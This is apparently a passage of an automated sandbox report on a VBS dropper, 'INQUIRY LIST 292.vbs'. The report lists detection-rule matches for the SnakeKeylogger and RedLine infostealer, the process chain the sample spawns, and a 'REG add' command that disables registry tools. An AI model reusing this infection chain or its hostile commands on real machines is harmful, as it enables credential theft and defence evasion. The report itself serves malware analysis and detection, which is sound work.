            Source: 6.2.liuuazhU.pif.1d036826.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 17.1.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.2.liuuazhU.pif.2a99772e.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.1.liuuazhU.pif.400000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 10.2.Uhzauuil.PIF.20f96fd8.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.3.liuuazhU.pif.1b37a088.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 11.2.liuuazhU.pif.2ab30000.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.3.liuuazhU.pif.28cff190.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 6.1.liuuazhU.pif.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.3.liuuazhU.pif.1a55c2f8.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 10.2.Uhzauuil.PIF.20f5dfa8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 11.1.liuuazhU.pif.43d038.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.2.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 6.1.liuuazhU.pif.43d038.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 1.2.x.exe.215607b8.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 17.2.liuuazhU.pif.43d038.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000011.00000001.2046847022.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000B.00000002.3116443932.000000002AA80000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3116343465.000000002A956000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3118421537.000000002BD31000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3109591892.000000001C560000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3109192607.000000001C136000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000003.1986218044.0000000028CFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000002.3110746880.000000001E421000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3111207326.000000001D7F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3089643523.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000006.00000003.1856725712.000000001B37A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000003.2056284697.000000001A55C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000011.00000002.3089641728.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000006.00000002.3108782055.000000001CFF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 0000000B.00000002.3116923850.000000002AB30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000002.3089721536.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000006.00000002.3109265688.000000001D3A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000001.1853843841.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0000000B.00000001.1965196360.0000000000400000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000011.00000002.3110271485.000000001C760000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: 00000006.00000002.3111442150.000000001F8A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: liuuazhU.pif PID: 1856, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: liuuazhU.pif PID: 5640, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: Process Memory Space: liuuazhU.pif PID: 5956, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@28/11@3/3
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027D7FD4 GetDiskFreeSpaceA,1_2_027D7FD4
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 1_2_027E6DC8 CoCreateInstance,1_2_027E6DC8
            Source: C:\Users\Public\Libraries\liuuazhU.pifCode function: 6_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,task_proc,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,6_2_004019F0
            Source: C:\Users\user\AppData\Local\Temp\x.exeFile created: C:\Users\Public\Libraries\YKAJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1220:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1144:120:WilError_03
            Source: C:\Users\Public\Libraries\liuuazhU.pifMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1928:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5316:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6900:120:WilError_03
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\x.exeJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs"
            Source: C:\Users\Public\Libraries\liuuazhU.pifCommand line argument: 08A6_2_00413780
            Source: C:\Users\Public\Libraries\liuuazhU.pifCommand line argument: 08A11_2_00413780
            Source: C:\Users\Public\Libraries\liuuazhU.pifCommand line argument: 08A11_2_00413780
            Source: C:\Users\Public\Libraries\liuuazhU.pifCommand line argument: 08A11_1_00413780
            Source: C:\Users\Public\Libraries\liuuazhU.pifCommand line argument: 08A17_2_00413780
            Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: liuuazhU.pif, 00000006.00000002.3109531523.000000001D575000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D593000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000006.00000002.3109531523.000000001D585000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AE2A000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AE38000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 0000000B.00000002.3117150961.000000002AE1A000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C888000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C896000.00000004.00000800.00020000.00000000.sdmp, liuuazhU.pif, 00000011.00000002.3110411476.000000001C878000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: INQUIRY LIST 292.vbsReversingLabs: Detection: 31%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\INQUIRY LIST 292.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe"
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\UhzauuilF.cmd" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmd
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\Public\Libraries\Uhzauuil.PIF "C:\Users\Public\Libraries\Uhzauuil.PIF"
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\SysWOW64\reg.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Users\Public\Libraries\Uhzauuil.PIF "C:\Users\Public\Libraries\Uhzauuil.PIF"
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Temp\x.exe "C:\Users\user\AppData\Local\Temp\x.exe" Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\UhzauuilF.cmd" "Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\Public\Libraries\FX.cmdJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\x.exeProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pifJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pifJump to behavior
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /fJump to behavior
            Source: C:\Users\Public\Libraries\Uhzauuil.PIFProcess created: C:\Users\Public\Libraries\liuuazhU.pif C:\Users\Public\Libraries\liuuazhU.pif
            Source: C:\Users\Public\Libraries\liuuazhU.pifProcess created: C:\Windows\SysWOW64\reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msxml3.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msdart.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
